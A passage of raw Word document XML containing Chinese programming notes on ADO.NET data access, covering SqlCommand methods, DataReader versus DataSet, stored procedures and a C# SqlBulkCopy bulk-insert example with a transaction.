        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>赋予SQL语句：command.CommandText = sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>设置参数：command.Parameter.AddWithValue(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>执行命令：ExecuteNonQuery() ---执行命令，但不返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">          ExecuteReader()   ---执行命令，返回一个IDataReader</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">          ExecuteScalar()    ---执行命令，返回结果集中第一行第一列的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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用于从SQL Server数据源读取只进流的数据记录。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在线读取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读取数据时，Read方法在while循环中调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>访问列的时候，调用不同的GetXXX方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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用于针对结构型数据，XML数据和关系型数据的存储，远程处理和编程。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>离线读取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DataSet 由一组数据表组成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w: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6" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5085715" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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用于推送数据到DataSet，并针对数据库协调数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>赋予SQL语句：new SqlDataAdapter(sql,conn)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>填充数据集：adapter.Fill(ds)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>存储过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>设置调用的是存储过程，而非SQL语句：command.CommandType = CommandType.StoredProcedure;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>将参数传出去：adapter.SelectCommand = command;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SqlBulkCopy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于批量插入数据，这种方式比Insert方式性能要高许多。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>需要注意的是，DataTable中的列需要与即将插入的表的列兼容，名称和数据库的顺序完全一致。楼主往日期类型插入空值时就遇到了一个问题，那就是不能给这一列的设置Null值，而是要通过不给其赋值的方式。Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的表名要与数据库的表名一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>插入数据时，有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SqlBulkCopyOptions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>可以设置，它可以更改Sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BulkCopy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的行为，它是枚举类型，它的值如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>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Default</w:t>
            </w:r>
          </w:p>
        </w:tc>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使用所有选项的默认值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KeepIdentity</w:t>
            </w:r>
          </w:p>
        </w:tc>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保留源标识值。 未指定标识值时，该值由目标指派。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>这个很好理解，比如将A表中的数据批量导入到B表中，B表的标识列id依旧套用A表的id时就需要这个。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CheckConstraints</w:t>
            </w:r>
          </w:p>
        </w:tc>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插入数据时检查约束。 默认情况下，不检查约束。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>当数据是从外部导入时就需要检查约束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TableLock</w:t>
            </w:r>
          </w:p>
        </w:tc>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获取批量复制操作持续时间的批量更新锁定。 如果未指定，则使用行锁定。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KeepNulls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>在目标表中保留 null 值，而不考虑默认值的设置。 如果未指定，由默认值替换 null 值（适用时）。假如A表中的Salary为Null，B表中的Salary的默认值为0，那么A表导入B表后Salary的值会变成0。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widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>FireTriggers</w:t>
            </w:r>
          </w:p>
        </w:tc>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如果指定，则使服务器激发插入触发器，从而使行插入数据库。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widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>UseInternalTransaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5341" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="720"/>
                <w:tab w:val="left" w:pos="1440"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>如果指定，批量复制操作的每一批都将在事务内发生。如果指示该选项，并且还向构造函数提供 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/zh-cn/dotnet/api/system.data.sqlclient.sqltransaction?view=netframework-4.7.2" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SqlTransaction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t> 对象，则发生 </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/zh-cn/dotnet/api/system.argumentexception?view=netframework-4.7.2" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ArgumentException</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="21"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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 &lt;summary&gt;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 批量导入</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 &lt;/summary&gt;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 &lt;param name="dt"&gt;&lt;/param&gt;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 &lt;returns&gt;&lt;/returns&gt;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public static bool ExecuteNonQuery(DataTable dt)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SqlConnection connection = null;</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SqlTransaction tran = null;</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SqlBulkCopy sqlbulkcopy = null;</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try</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connection = new SqlConnection(connStr);</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connection.Open();</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tran = connection.BeginTransaction();//开启事务</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sqlbulkcopy = new SqlBulkCopy(connection, SqlBulkCopyOptions.CheckConstraints, tran);</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sqlbulkcopy.BulkCopyTimeout = 100;  //超时之前操作完成所允许的秒数</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sqlbulkcopy.BatchSize = dt.Rows.Count;  //每一批次中的行数</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sqlbulkcopy.DestinationTableName = dt.TableName;  //服务器上目标表的名称</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for (int i = 0; i &lt; dt.Columns.Count; i++)</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sqlbulkcopy.ColumnMappings.Add(i, i);  //映射定义数据源中的列和目标表中的列之间的关系</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sqlbulkcopy.WriteToServer(dt);  // 将DataTable数据上传到数据表中</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tran.Commit();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return true;</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catch (Exception e)</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if (connection != null)</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connection.Close();</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tran.Rollback();</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return false;</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finally</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if (connection != null)</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connection.Close();</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if(sqlbulkcopy != null)</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sqlbulkcopy.Close();</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ind w:firstLine="420"/>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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>来源：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/riddly/p/4072564.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>使用事务和SqlBulkCopy批量插入数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://docs.microsoft.com/zh-cn/dotnet/api/system.data.sqlclient.sqlbulkcopyoptions?view=netframework-4.7.2" </w:instrText>
      </w:r>
      <w:r>
